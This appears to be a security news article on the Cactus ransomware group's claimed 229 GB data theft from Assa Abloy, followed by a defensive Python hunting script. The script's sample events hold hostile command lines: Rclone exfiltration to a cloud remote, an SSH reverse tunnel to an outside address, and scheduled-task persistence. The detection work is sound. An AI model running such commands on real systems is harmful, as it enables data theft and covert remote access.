Assa Abloy, the global leader in access solutions, was hit by a ransomware attack for which the Cactus group has claimed responsibility. According to the group's claim, approximately 229 GB of data was exfiltrated, including confidential corporate strategies, agreements and contracts, personally identifiable information (passports, driver's licenses, contact details and home addresses of executive management and others), internal documents, audit records, legal data, financials, payroll information, corporate and personal correspondence, and database exports.
Assa Abloy’s Profile
Assa Abloy AB, headquartered in Stockholm, Sweden, is renowned for its innovative access solutions. The company’s offerings include efficient door openings, trusted identities, and entrance automation, aiming to provide safe, secure, and convenient access to both physical and digital spaces. With a reported revenue of $14.4 billion, Assa Abloy holds a dominant position in the global market.

Details of the Attack
The Cactus ransomware group claimed responsibility for the attack on Assa Abloy, alleging that it had exfiltrated 229 GB of data and threatening to publish it unless a ransom is paid. This is double extortion: the attacker both encrypts the victim's files and keeps a stolen copy, so restoring from backups removes only half of the leverage, and the threat of publication is used to increase the pressure to pay.
Assa Abloy’s Response
In response to the breach, Assa Abloy's communications manager, Christiane Belfrage, stated that the incident was caused by a third party and that an internal investigation had found access to certain data on a few local servers in Sweden, mainly internal information. The company does not believe that the incident will have any "material financial impact".
Understanding Cactus Ransomware
Cactus ransomware is a relatively new strain that emerged in March 2023. It typically gains initial access by exploiting vulnerabilities in virtual private network (VPN) software. Once inside, the operators establish persistence through SSH backdoors and scheduled tasks, conduct network reconnaissance, and steal user credentials before deploying the encryptor. Files are locked with a combination of RSA and AES, the usual hybrid arrangement in which AES encrypts the file contents and RSA protects the AES key, so that recovery depends on the attacker's private key. Before encryption, data is staged and exfiltrated with tools such as Rclone to cloud storage, which supplies the second half of the group's double-extortion scheme.
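The post-compromise behaviour described above (scheduled-task persistence, SSH backdoors and Rclone exfiltration to cloud storage) leaves recognisable traces in process-creation telemetry. The following is an added example of how a hunt over such telemetry might look; it is not code from the article or from any vendor. The events are constructed for illustration, and the flat field names (host, user, image, cmdline) are an assumed normalised schema rather than any product's actual log format.

```python
"""Hunt for scheduled-task persistence, SSH reverse tunnels and Rclone
exfiltration in process-creation events.

Added example; the events below are constructed and the flat field names
(host, user, image, cmdline) are an assumed normalised schema."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    technique: str
    detail: str


# Rclone verbs that move data; "ls"/"lsd" only list a remote and are not flagged.
RCLONE_XFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Rclone addresses a configured remote as "<name>:<path>". A bare drive letter
# ("C:\...") has the same shape, so names of a single character are excluded.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]+:")
# Locations writable without admin rights; a task action living here deserves
# more attention than one pointing into System32.
WRITABLE_HINTS = ("\\programdata\\", "\\users\\public\\", "\\temp\\", "\\appdata\\")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokens(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted paths as single tokens."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def _stem(image: str) -> str:
    return PureWindowsPath(image).stem.lower()


def _value_after(argv, low, flag):
    """Return the argument following `flag` (case-insensitive), or '?'."""
    if flag in low and low.index(flag) + 1 < len(argv):
        return argv[low.index(flag) + 1]
    return "?"


def check_scheduled_task(ev, argv):
    low = [a.lower() for a in argv]
    if _stem(ev["image"]) != "schtasks" or "/create" not in low:
        return None
    name, action = _value_after(argv, low, "/tn"), _value_after(argv, low, "/tr")
    suffix = " from a user-writable path" if any(h in action.lower() for h in WRITABLE_HINTS) else ""
    return Finding(ev["host"], ev["user"], "scheduled_task_persistence",
                   f"task {name!r} runs {action!r}" + suffix)


def check_rclone(ev, argv):
    if _stem(ev["image"]) != "rclone":
        return None
    verb = next((a.lower() for a in argv[1:] if not a.startswith("-")), "")
    remotes = [a for a in argv[2:] if REMOTE_RE.match(a)]
    if verb not in RCLONE_XFER_VERBS or not remotes:
        return None
    return Finding(ev["host"], ev["user"], "rclone_exfiltration",
                   f"rclone {verb} to remote {remotes[-1]!r} from {ev['image']!r}")


def check_ssh_tunnel(ev, argv):
    if _stem(ev["image"]) != "ssh":
        return None
    forwards = []
    for i, a in enumerate(argv):
        if a == "-R" and i + 1 < len(argv):      # "-R 2222:host:port"
            forwards.append(argv[i + 1])
        elif a.startswith("-R") and len(a) > 2:  # "-R2222:host:port"
            forwards.append(a[2:])
    if not forwards:
        return None
    target = next((a for a in argv if "@" in a), argv[-1])
    return Finding(ev["host"], ev["user"], "ssh_reverse_tunnel",
                   f"remote forward {forwards[0]!r} established via {target!r}")


CHECKS = (check_scheduled_task, check_rclone, check_ssh_tunnel)


def hunt(events) -> list:
    findings = []
    for ev in events:
        argv = tokens(ev["cmdline"])
        if not argv:
            continue
        findings.extend(f for f in (check(ev, argv) for check in CHECKS) if f)
    return findings


# Constructed sample telemetry: three malicious events and two benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "se-file01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /tr "C:\ProgramData\up.exe" /sc minute /mo 5 /ru SYSTEM'},
    {"host": "se-file01", "user": "CORP\\svc_backup", "image": r"C:\ProgramData\rc\rclone.exe",
     "cmdline": r'rclone.exe copy "E:\Shares\Legal" mega:exfil/legal --transfers 16 --config C:\ProgramData\rc\rc.conf'},
    {"host": "se-jump02", "user": "CORP\\admin.t", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10"},
    {"host": "se-ws114", "user": "CORP\\j.doe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /query /tn OneDriveUpdate"},
    {"host": "se-ws114", "user": "CORP\\j.doe", "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe lsd corpshare:"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.host} {f.user}: {f.detail}")
```

Two caveats a practitioner should keep in mind: the Rclone rule matches on the executable name, so a renamed binary evades it and should be complemented by a rule on the distinctive `<remote>:<path>` argument shape or on the file hash; and scheduled-task creation through the Task Scheduler COM API or PowerShell cmdlets produces no schtasks.exe process at all, so the Windows task-creation audit event is the more reliable source for persistence.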
Conclusion
The ransomware attack on Assa Abloy underscores the threat that groups like Cactus pose even to large, well-resourced companies. It also shows where defenders should concentrate: keeping internet-facing VPN software patched, watching for the persistence and exfiltration tooling described above, and recognising that, under double extortion, backups protect availability but do nothing to stop stolen data from being published.